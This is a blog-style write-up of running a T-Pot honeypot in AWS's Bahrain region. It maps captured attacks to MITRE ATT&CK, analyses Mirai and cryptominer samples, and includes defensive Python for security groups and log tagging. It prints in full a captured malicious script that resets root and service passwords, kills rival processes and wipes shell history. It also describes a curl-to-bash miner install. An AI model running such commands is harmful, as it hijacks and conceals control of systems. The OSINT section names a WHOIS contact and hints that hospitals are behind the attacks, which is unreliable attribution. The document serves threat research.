I Planted A Honeypot in the Middle East
On February 7, 2022, I planted a honeypot in Bahrain, one of the wealthiest countries in the Middle East.
Adversaries quickly noticed its presence and began executing a variety of attacks against it.
Over the span of a week, more than 300,000 instances of unauthorized activity originated from around the globe, with hot spots in Vietnam, Russia, India, and the United States.
What are Honeypots?
Honeypots are network-attached systems designed to mimic targets of cyberattacks.
Security researchers use them to identify attacks, deflect them from a legitimate target, and learn how hackers operate.
You might’ve never heard of them before, but honeypots have been around for decades.
The principle behind them is simple: Don’t go looking for attackers.
Instead, release something that would attract malicious entities — the honeypot — and then wait for them to show up.
Purpose
Understanding the techniques, tactics, and procedures (TTPs) utilized by hackers is crucial to establishing innovative and effective security measures.
In the field of cybersecurity, there are two primary “teams” that are commonly referenced:
Red Team and Blue Team.
The former emulates the adversarial pursuits of attackers, whereas the latter identifies threat actors and defends infrastructures.
Both teams work in tandem to enhance the security status of an organization.
Now that you see the importance of grasping the offensive TTPs used by attackers, let me introduce you to the framework I’ll be using for that very purpose:
The MITRE ATT&CK framework.
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a curated knowledge base and model for malicious cyber behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they commonly target.
The framework is a valuable resource for everyone involved in InfoSec because of its depth regarding a hacker’s approach and mindset.
Implementation
Inside of Amazon Web Services (AWS), I used a Debian 10 Buster EC2 instance to host T-Pot.
T-Pot is a virtual machine (VM) created by T-Mobile that is composed of multiple honeypots.
Every component inside the VM is dockerized, meaning each one runs in its own container.
This enables T-Pot to run multiple tools and honeypot daemons on a shared network interface while maintaining a small footprint and constraining each honeypot within its own environment.
Here’s an overview of one of its built-in honeypot daemons:
Cowrie
Cowrie is a medium-to-high interaction SSH and Telnet honeypot designed to log brute-force attacks and shell commands executed by attackers.
In medium interaction mode, it mirrors a UNIX system, whereas in high interaction mode, it functions as an SSH and Telnet proxy that observes malicious behavior.
Installation
After launching the AWS instance, setting up T-Pot was simple:
- Cloned the T-Pot GitHub repository and completed the installation process
- Allowed administration from my IP address on two specific ports (64295 and 64297)
- Permitted traffic from the outside world on ports 1–64000
Using the ELK Stack it provides (Elasticsearch, Logstash, and Kibana), I aggregated logs from my honeypot daemons and created visualizations for monitoring, troubleshooting, data analytics, etc.
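The installation steps above come down to one security-group decision: the two T-Pot administration ports are reachable only from the operator's own address, while the honeypot port range is open to the whole internet. The following Python (boto3) is an added example, not T-Pot's own installer or documentation. The group id and admin IP are placeholders, the region me-south-1 is AWS's Bahrain region but the article does not name the region it used, and opening the 1-64000 range for both TCP and UDP is an assumption, since the article names no protocol.

```python
"""Build and sanity-check the ingress rules for a T-Pot security group.

Added example, not part of T-Pot. Ports follow the article: 64295 and 64297
for administration, 1-64000 exposed to attackers.
"""
import ipaddress

ADMIN_PORTS = (64295, 64297)   # T-Pot SSH and web UI (from the article)
HONEYPOT_RANGE = (1, 64000)    # ports the honeypot daemons answer on
ANYWHERE = "0.0.0.0/0"


def build_ingress_rules(admin_ip):
    """Return the IpPermissions list that boto3's authorize_security_group_ingress expects."""
    # A single host address (/32) for the management ports, never a wide range.
    admin_cidr = f"{ipaddress.ip_address(admin_ip)}/32"
    rules = [
        {"IpProtocol": "tcp", "FromPort": port, "ToPort": port,
         "IpRanges": [{"CidrIp": admin_cidr, "Description": "T-Pot admin"}]}
        for port in ADMIN_PORTS
    ]
    lo, hi = HONEYPOT_RANGE
    for proto in ("tcp", "udp"):  # assumption: article does not say which protocols
        rules.append({"IpProtocol": proto, "FromPort": lo, "ToPort": hi,
                      "IpRanges": [{"CidrIp": ANYWHERE, "Description": "honeypot exposure"}]})
    return rules


def check_rules(rules):
    """Return a list of problems: any rule that lets 0.0.0.0/0 reach an admin port."""
    problems = []
    for rule in rules:
        for port in ADMIN_PORTS:
            if rule["FromPort"] <= port <= rule["ToPort"]:
                for ip_range in rule["IpRanges"]:
                    if ip_range["CidrIp"] == ANYWHERE:
                        problems.append(
                            f"admin port {port} open to the world via "
                            f"{rule['FromPort']}-{rule['ToPort']}/{rule['IpProtocol']}")
    return problems


def apply_rules(group_id, admin_ip, region="me-south-1"):
    """Push the rules to AWS. Needs boto3 and credentials; group_id is a placeholder."""
    import boto3  # imported here so the pure rule builder works without boto3 installed
    rules = build_ingress_rules(admin_ip)
    problems = check_rules(rules)
    if problems:
        raise ValueError("refusing to apply: " + "; ".join(problems))
    ec2 = boto3.client("ec2", region_name=region)
    return ec2.authorize_security_group_ingress(GroupId=group_id, IpPermissions=rules)


if __name__ == "__main__":
    for rule in build_ingress_rules("203.0.113.10"):  # placeholder admin IP
        print(rule["IpProtocol"], rule["FromPort"], rule["ToPort"], rule["IpRanges"][0]["CidrIp"])
    # apply_rules("sg-PLACEHOLDER", "203.0.113.10")  # uncomment with real values
```

build_ingress_rules is pure, so the rule set can be reviewed or unit-tested before apply_rules touches the account; check_rules catches the mistake T-Pot operators most often make, a wide port range that silently swallows the administration ports.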
MITRE ATT&CK Data Correlation
This article aims to tie my findings to the MITRE ATT&CK framework while also analyzing malware and conducting OSINT on the offenders.
Data analysis revealed that the main goals behind the attacks were to add my honeypot to a botnet and install cryptocurrency miners on it.
Botnets
A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.
It is a sub-technique of T1583, Acquire Infrastructure, a resource development tactic within the MITRE ATT&CK framework.
“With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale phishing or Distributed Denial of Service (DDoS).”
The following commands display an information-gathering attack that was frequently performed against my Cowrie daemon:
Starting from the bottom, ifconfig was run to identify network interfaces on the machine.
Secondly, uname -a was executed to print all system information.
This was likely done to determine whether or not my honeypot’s kernel version, OS architecture, and operating system coincided with the requirements for the adversary’s botnet.
Lastly, cat /proc/cpuinfo was used to print a read-only text file containing information about my honeypot’s CPU.
Here’s an example of what that command would output:
. . .
vendor_id : GenuineIntel
cpu family : 6
model : 158
model name : Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz
stepping : 10
cpu MHz : 3696.002
cache size : 12288 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
. . .
These are all instances of adversarial reconnaissance, a technique centered on using information gathered from a victim’s host to improve the efficacy of malicious endeavors.
Cryptocurrency Miners
A cryptominer is a stealthy type of malware that takes advantage of a system’s resources to generate revenue for the hackers controlling it, usually by mining Bitcoin, Ethereum, or Monero.
Instead of using expensive GPU farms, cryptominers utilize the processing power of compromised computers and servers.
This process, commonly referred to as cryptojacking, leads to adverse side effects such as:
- System disruption
- Increased processor usage
- Overheating machines
- Excessively high power bills
The following screenshot displays the commands that an attacker used to install a cryptominer called “c3pool_miner.”
First, they retrieved a setup script via curl and piped it to Bash for execution.
Then, they filtered through all running processes with ps | grep "[Mm]iner" to see if their cryptominer was successfully installed.
This attack, known as resource hijacking, corresponds to technique T1496 within MITRE ATT&CK and can be performed on virtually all platforms, including containerized environments.
Command History Exhibit
Malware Analysis
wget and curl were frequently used by attackers to download and execute malicious files from external web servers.
Knowing that, let’s inspect some of the malware that hackers installed on my honeypot.
We can insert the SHA256 hashes (unique fingerprints) of interesting binary files into VirusTotal, an online resource used to analyze suspicious files and automatically share them with the InfoSec community.
Mirai Botnet Malware
One of the malicious ELF 32-bit executables downloaded to my Cowrie honeypot daemon belongs to the Mirai Botnet.
Mirai infects smart devices that run on ARC processors, effectively turning them into a network of remotely controlled bots or “zombies.”
Mirai starts as a self-propagating worm, replicating itself once it infects and locates another vulnerable IoT device.
Propagation is accomplished by using infected IoT devices to scan the internet and discover additional vulnerable targets (T0883).
If a suitable device is found, the already-infected device reports its findings back to a command and control (C2) server.
Once the C2 server receives a list of vulnerable devices, it loads a payload and infects the targets.
After compromising an array of machines, C2 servers can utilize many DDoS techniques such as HTTP, TCP, and UDP flooding (T1498.001).
Mirai focuses on infecting as many devices as possible, which isn’t difficult due to the lack of security within Internet of Things (IoT) devices.
Initially, Mirai compromised IoT devices with brute-force attacks that filled in 64 sets of default usernames and passwords like “admin” and “password.”
However, its latest modules use up-to-date vulnerabilities to maximize efficiency.
This can be seen in newer variants of the botnet, such as “IoT.Linux.MIRAI.VWISI” found in July 2020, which uses CVE-2020-10173 to exploit Comtrend VR-3033 routers.
Even more recently, AT&T’s Alien Labs identified a variant dubbed “Moobot” sharply increasing its scans for Tenda routers that are exploitable with a critical remote code execution (RCE) vulnerability.
quickr1n.sh — Recon for Cryptominers
Here’s the content of quickr1n.sh, a malicious shell script that was executed on Cowrie:
echo root:r14sdgs24h3h12sd344|chpasswd|bash;
echo gns3:1r43gs1asdan4asd4asd113s24h3h12344| sudo chpasswd -e
echo jenkins:r4113asdgs2asd4g1s324h3h12344| sudo chpasswd -e
echo ansible:r4131asdg1saasd14sn43gd24h3h12344| sudo chpasswd -e
#temp_root_pass
pkill java; pkill ntpd; pkill screen; pkill cnrig;
pkill xmrig; pkill brrr; pkill x86_64; pkill x86;
pkill docker; pkill tsm; pkill krn;
pkill ip; pkill .dhpcd; pkill xms;
echo fk
rm -rf /root/.history
rm -rf /root/*_history
rm -rf /root/.login
rm -rf /root/.logout
rm -rf /root/.bash_logut
rm -rf /root/.Xauthority
echo 1
nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c
lspci | grep "3D controller" | cut -f5- -d ' '
lspci | grep VGA -c
lspci | grep VGA | cut -f5- -d ' '
uptime -p
ip r | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}'
history -n; history -c
cat /dev/null > ~/.bash_history && history -c
echo done
Notice the line containing nvidia-smi -q?
Attackers used it to retrieve my honeypot’s GPU specifications and gather cryptojacking info.
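The recon commands seen earlier (ifconfig, uname -a, cat /proc/cpuinfo), the curl-to-Bash miner install, and the commands inside quickr1n.sh all map onto MITRE ATT&CK techniques, and Cowrie records every command an attacker types as a cowrie.command.input JSON event. The following Python is an added example, not part of T-Pot or Cowrie: it parses such events, tags each command with technique IDs, summarizes per session, and runs the same tagger over a script excerpt as a static triage. The log lines and the script excerpt are constructed for this example (documentation IP addresses, an .invalid download URL, the password replaced by a placeholder); the technique IDs are real ATT&CK IDs, but which command pattern lands under which ID is this example's own mapping.

```python
"""Tag attacker commands from Cowrie logs and dropped scripts with ATT&CK technique IDs.

Added example, not Cowrie's or T-Pot's code. Sample data below is constructed.
"""
import json
import re
from collections import defaultdict

# Technique table used by this example. IDs are real ATT&CK IDs; the choice of
# which command pattern belongs under which ID is this example's own mapping.
RULES = [
    ("T1098",     "Account Manipulation",                   re.compile(r"\bchpasswd\b")),
    ("T1489",     "Service Stop (killing rival processes)", re.compile(r"\bpkill\b")),
    ("T1070.003", "Clear Command History",                  re.compile(r"history -[cn]|[._]history\b")),
    ("T1496",     "Resource Hijacking",                     re.compile(r"xmrig|cnrig|c3pool|nvidia-smi", re.I)),
    ("T1105",     "Ingress Tool Transfer",                  re.compile(r"\b(curl|wget)\b")),
    ("T1057",     "Process Discovery",                      re.compile(r"\bps\b")),
    ("T1016",     "System Network Configuration Discovery", re.compile(r"\b(ifconfig|ip r)\b")),
    ("T1082",     "System Information Discovery",           re.compile(r"\buname\b|/proc/cpuinfo|\blspci\b|\buptime\b")),
]
NAMES = {tid: name for tid, name, _ in RULES}

# Constructed Cowrie-style JSON events (not real log data; RFC 5737 documentation IPs).
COWRIE_LOG = r"""
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2022-02-12T03:14:01Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1b2c3","input":"cat /proc/cpuinfo","timestamp":"2022-02-12T03:14:02Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1b2c3","input":"uname -a","timestamp":"2022-02-12T03:14:03Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1b2c3","input":"ifconfig","timestamp":"2022-02-12T03:14:04Z"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.9","session":"d4e5f6","username":"root","password":"admin","timestamp":"2022-02-12T03:20:00Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.9","session":"d4e5f6","input":"curl -fsSL http://example.invalid/c3pool_setup.sh | bash","timestamp":"2022-02-12T03:20:11Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.9","session":"d4e5f6","input":"ps | grep \"[Mm]iner\"","timestamp":"2022-02-12T03:20:15Z"}
"""

# Constructed excerpt in the style of quickr1n.sh; the password is a placeholder.
SCRIPT_EXCERPT = """\
echo root:<new-password>|chpasswd|bash;
pkill java; pkill xmrig; pkill cnrig;
rm -rf /root/.bash_history
nvidia-smi -q | grep "Product Name" | awk '{print $4, $5}' | grep . -c
lspci | grep VGA -c
uptime -p
ip r | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}'
history -n; history -c
echo done
"""


def classify(command):
    """Return every technique ID whose pattern appears in one command line (may be empty)."""
    return [tid for tid, _name, pattern in RULES if pattern.search(command)]


def parse_cowrie(lines):
    """Yield (session, src_ip, command) for command-input events; skip other events and bad JSON."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated or non-JSON line must not abort the whole run
        if event.get("eventid") == "cowrie.command.input":
            yield event.get("session", "?"), event.get("src_ip", "?"), event.get("input", "")


def summarize_sessions(log_text):
    """Group commands by Cowrie session: {session: {src_ip, commands, techniques}}."""
    sessions = {}
    for session, src_ip, command in parse_cowrie(log_text.splitlines()):
        entry = sessions.setdefault(session, {"src_ip": src_ip, "commands": [], "techniques": set()})
        entry["commands"].append(command)
        entry["techniques"].update(classify(command))
    for entry in sessions.values():
        entry["techniques"] = sorted(entry["techniques"])
    return sessions


def triage_script(script_text):
    """Static review of a dropped shell script: {technique id: [lines that triggered it]}."""
    hits = defaultdict(list)
    for line in script_text.splitlines():
        for tid in classify(line):
            hits[tid].append(line)
    return dict(hits)


if __name__ == "__main__":
    for session, entry in summarize_sessions(COWRIE_LOG).items():
        print(session, entry["src_ip"], [f"{t} {NAMES[t]}" for t in entry["techniques"]])
    for tid, lines in triage_script(SCRIPT_EXCERPT).items():
        print(tid, NAMES[tid], len(lines), "line(s)")
```

Keeping classify a plain regex table makes it easy to extend with new miner names or C2 downloaders as they show up in the Kibana dashboards, and because the same tagger runs over both live session logs and recovered scripts, a session and the script it dropped can be compared for consistency.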
SHA256 hash of the script: a9ee220389355426509c31859695bf2f062b5460743b32be5db8235115c489f5
Entering the file’s unique fingerprint into VirusTotal provides the following page, showing that only 5 out of 59 security vendors flagged the file as malicious:
OSINT
Now that we’ve gone over some of the malware installed on the honeypot, what’s next?
Well, you may be wondering who initiated these attacks.
We can utilize public resources and key aspects of the data we’ve gathered thus far to learn about potential culprits.
That’s the idea behind open-source intelligence, or OSINT for short.
The following demonstrates the detective-like approach I used to gain info on one of the attacks.
The Swiss Origin of quickr1n.sh
My logs reveal that the cryptominer script mentioned earlier, quickr1n.sh, was installed by an entity in Zürich, Switzerland.
The attacker’s ISP, Private Layer, holds its operations in Panama City, Panama.
Their website shows that they provide unmanaged, dedicated servers hosted in Switzerland, a country known for its strict privacy laws.
Let’s travel to the coordinates we have, 47.355, 8.555, inside of Google Maps.
Interesting… it looks like the attack originated very close to a university building!
Perhaps one or more of their machines are compromised?
According to Google Maps, the building is a subset of the University Hospital of Zürich.
“Kalaidos Fachhochschule Gesundheit” translates to Careum University of Health.
This isn’t surprising, as university hospitals (hospitals that conduct medical research and provide education to medical students) are frequent targets of cyberattacks.
Let’s conduct further reconnaissance on the IP address tied to the attack.
Looks like it’s blacklisted by 13 out of 115 IP integrity engines.
Opening one of them, DroneBL, reveals that it was flagged for automated SSH dictionary attacks on February 12, 2022, the same day of the attack!
We can advance our search by making a WHOIS query to obtain information on the IP address.
WHOIS is a public database that stores contact and registration information for domain names.
We received a name (Milciades Garcia), a phone number, AND an address in Panama!
Googling the building shows that it’s a high-rise building mainly used for commercial offices.
Once again, it’s located right next to a hospital, which is interesting.
There are more OSINT areas we could look into if we wanted to go really in-depth, but I’ll stop here.
Thank you for reading about my experience planting a honeypot in the Middle East.